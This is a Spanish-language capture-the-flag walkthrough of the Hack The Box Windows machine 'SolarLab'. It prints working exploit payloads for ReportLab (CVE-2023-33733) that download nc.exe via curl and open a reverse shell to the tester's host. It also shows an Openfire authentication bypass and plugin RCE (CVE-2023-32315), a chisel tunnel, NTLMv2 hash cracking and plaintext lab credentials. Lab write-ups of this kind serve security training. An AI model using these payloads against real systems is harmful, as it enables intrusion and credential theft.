Solar Lab

OS: Windows
Dificultad: Medio
Puntos: 30

Nmap

ports=$(nmap -p- --min-rate=5000 -T4 10.129.245.145 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -vvv -p $ports -sC -sV -oN nmap.txt 10.129.245.145
Nmap scan report for 10.129.245.145
Host is up, received echo-reply ttl 127 (0.20s latency).
Scanned at 2024-05-11 20:42:53 EDT for 58s

PORT     STATE SERVICE       REASON          VERSION
80/tcp   open  http          syn-ack ttl 127 nginx 1.24.0
|_http-title: Did not follow redirect to http://solarlab.htb/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.24.0
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds? syn-ack ttl 127
6791/tcp open  http          syn-ack ttl 127 nginx 1.24.0
|_http-server-header: nginx/1.24.0
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://report.solarlab.htb:6791/
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Enumeration

Agregamos los el dominio y el subdominio a nuestro archivo hosts.

echo "10.129.245.145  solarlab.htb report.solarlab.htb" >> /etc/hosts

Se encuentra un directorio llamado Documents en el SMB.

┌──(root㉿kali)-[~/htb/Box/SolarLab]
└─# smbclient -L 10.129.245.145                                                        
Password for [WORKGROUP\root]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Documents       Disk      
        IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.245.145 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Podemos acceder al directorio.

┌──(root㉿kali)-[~/htb/Box/SolarLab]
└─# smbclient //10.129.245.145/Documents 
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Fri Apr 26 10:47:14 2024
  ..                                 DR        0  Fri Apr 26 10:47:14 2024
  concepts                            D        0  Fri Apr 26 10:41:57 2024
  desktop.ini                       AHS      278  Fri Nov 17 05:54:43 2023
  details-file.xlsx                   A    12793  Fri Nov 17 07:27:21 2023
  My Music                        DHSrn        0  Thu Nov 16 14:36:51 2023
  My Pictures                     DHSrn        0  Thu Nov 16 14:36:51 2023
  My Videos                       DHSrn        0  Thu Nov 16 14:36:51 2023
  old_leave_request_form.docx         A    37194  Fri Nov 17 05:35:57 2023

                7779839 blocks of size 4096. 1895172 blocks available
smb: \>

Descargamos el archivo details-file.xlsx.

smb: \> get details-file.xlsx
getting file \details-file.xlsx of size 12793 as details-file.xlsx (21.4 KiloBytes/sec) (average 21.4 KiloBytes/sec)

Vemos que hay usuarios y passwords.

User Enumeration

En la pagina web http://report.solarlab.htb:6791/login hay un formulario de autenticacion. La pagina web muestra diferentes mensajes si el usuario existe o no, esto nos permite enumerar los usuarios.

Una vez que tenemos los usuario podemos hacer password spraying.

La cuenta blakeb nos permite acceder.

blakeb : ThisCanB3typedeasily1@

ReportLab RCE (CVE-2023-33733)

Despues probar todas las funcionalidades nos percatamos que la aplicacion genera PDFs con la herramienta ReportLab.

Identificamos que esta herramienta cuenta con una vulnerabilidad de RCE.

https://github.com/Sudistark/BB-Writeups/blob/main/2023/CVE-2023-33733-rce-via-htmli-in-reportlab.md

Haciendo pruebas nos dimos cuenta que en la funcion de Travel Approval podemos explotar esta vulnerabildad pero en el parametro travel_request ya que en los otros tenemos algunas restricciones.

<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('curl 10.10.14.218') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">exploit</font></para>

┌──(root㉿kali)-[~/htb/Box/SolarLab]
└─# python3 -m http.server 80                     
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.245.145 - - [11/May/2024 22:49:02] "GET / HTTP/1.1" 200 -

Con esto podemos obtener una reverse shell. Primero creamos una carpeta donde descargaremos nc.exe.

<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('mkdir c:\\temp') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">exploit</font></para>

Descargamos el binario en la carpeta.

<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('curl 10.10.14.218/nc.exe -o c:\\temp\\nc.exe') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">exploit</font></para>

Despues ejecutamos la reverse shell.

<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('c:\\temp\\nc.exe -e cmd.exe 10.10.14.218 1234') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">exploit</font></para>

Lateral Movement

Ya que estamos dentro de la maquina identificamos que esta instalado Openfire.

c:\Program Files>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 385E-AC57

 Directory of c:\Program Files

05/03/2024  02:34 PM    <DIR>          .
05/03/2024  02:34 PM    <DIR>          ..
11/16/2023  10:39 PM    <DIR>          Common Files
04/26/2024  04:39 PM    <DIR>          Internet Explorer
11/17/2023  11:04 AM    <DIR>          Java
11/16/2023  10:47 PM    <DIR>          Microsoft Update Health Tools
12/07/2019  12:14 PM    <DIR>          ModifiableWindowsApps
11/17/2023  03:22 PM    <DIR>          Openfire

Port Forwarding

Haremos un portforward para acceder al puerto de openfire con chisel. Descargamos el programa en la maquina.

python3 -m http.server 80
curl 10.10.14.105/chisel.exe -o c:\temp\chisel.exe

Creamos el tunel de la siguiente forma.

┌──(root㉿kali)-[~/htb/Box/SolarLab]
└─# /opt/linux/chisel server -p 5555 --reverse                                                                              
2024/05/11 23:27:38 server: Reverse tunnelling enabled
2024/05/11 23:27:38 server: Fingerprint TOEwBCujyzAMJQGNMI8GuRRNJUqUJzmvpWlm/zVbC08=
2024/05/11 23:27:38 server: Listening on http://0.0.0.0:5555
2024/05/11 23:28:31 server: session#1: tun: proxy#R:9090=>9090: Listening
c:\temp>chisel.exe client 10.10.14.218:5555 R:9090:127.0.0.1:9090
chisel.exe client 10.10.14.218:5555 R:9090:127.0.0.1:9090
2024/05/12 06:28:30 client: Connecting to ws://10.10.14.218:5555
2024/05/12 06:28:31 client: Connected (Latency 167.5984ms)

Ahora podemos acceder al portal.

OpenFire Auth Bypass (CVE-2023-32315)

En nuestra investigacion del inicio relacionado con Openfire identificamos que podemos obtener RCE como lo mencionan los siguientes recursos.

https://github.com/miko550/CVE-2023-32315
https://vulncheck.com/blog/openfire-cve-2023-32315
https://github.com/K3ysTr0K3R/CVE-2023-32315-EXPLOIT

Nos creamos un usuario random.

┌──(root㉿kali)-[~/htb/Box/SolarLab]
└─# python3 CVE-2023-32315.py -t http://127.0.0.1:9090


 ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗      ██████╗ ██████╗ ██████╗  ██╗███████╗
██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗     ╚════██╗╚════██╗╚════██╗███║██╔════╝
██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗█████╔╝ █████╔╝ █████╔╝╚██║███████╗
██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝╚═══██╗██╔═══╝  ╚═══██╗ ██║╚════██║
╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝     ██████╔╝███████╗██████╔╝ ██║███████║
 ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝      ╚═════╝ ╚══════╝╚═════╝  ╚═╝╚══════╝
                                                                                                       
Openfire Console Authentication Bypass Vulnerability (CVE-2023-3215)
Use at your own risk!

[..] Checking target: http://127.0.0.1:9090
Successfully retrieved JSESSIONID: node01rz9bs7xhmxrf13l0fomzxgetx1.node0 + csrf: holx9y5uZIvsaGw
User added successfully: url: http://127.0.0.1:9090 username: i78j4t password: 5vsjyv

Con esas credenciales podemos acceder.

OpenFire RCE (CVE-2023-32315)

Ahora obtendremos RCE de la siguiente forma. Primero descargaremos el plugin openfire-management-tool-plugin.jar y lo subimos en el apartado de plugins.

Una vez que se suba el plugin iremos al apartado de Server Settings y seleccionaremos la opcion Management Tool.

Nos pedira el password que es 123 y accederemos correctamente. Posteriormente seleccionaremos la opcion system command para poder ejecutar comandos.

Obtenemos una reverse shell.

c:\temp\nc.exe 10.10.14.218 4444 -e cmd.exe

Privilege Escalation

Con winpeas podemos obtener el hash NTLMv2 para posteriormente crackearlo.

┌──(root㉿kali)-[~/htb/Box/SolarLab]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt            
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
HotP!fireguard   (openfire)     
1g 0:00:00:13 DONE (2024-05-12 00:01) 0.07530g/s 835855p/s 835855c/s 835855C/s Howla8@hotmail.co.uk..Honey40
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed. 

Verificamos que tenemos acceso.

┌──(root㉿kali)-[~/htb/Box/SolarLab]
└─# crackmapexec smb 10.129.245.145 -u 'openfire' -p 'HotP!fireguard'
SMB         10.129.245.145  445    SOLARLAB         [*] Windows 10 / Server 2019 Build 19041 x64 (name:SOLARLAB) (domain:solarlab) (signing:False) (SMBv1:False)
SMB         10.129.245.145  445    SOLARLAB         [+] solarlab\openfire:HotP!fireguard
Administrator : ThisPasswordShouldDo!@
impacket-psexec Administrator@10.129.245.145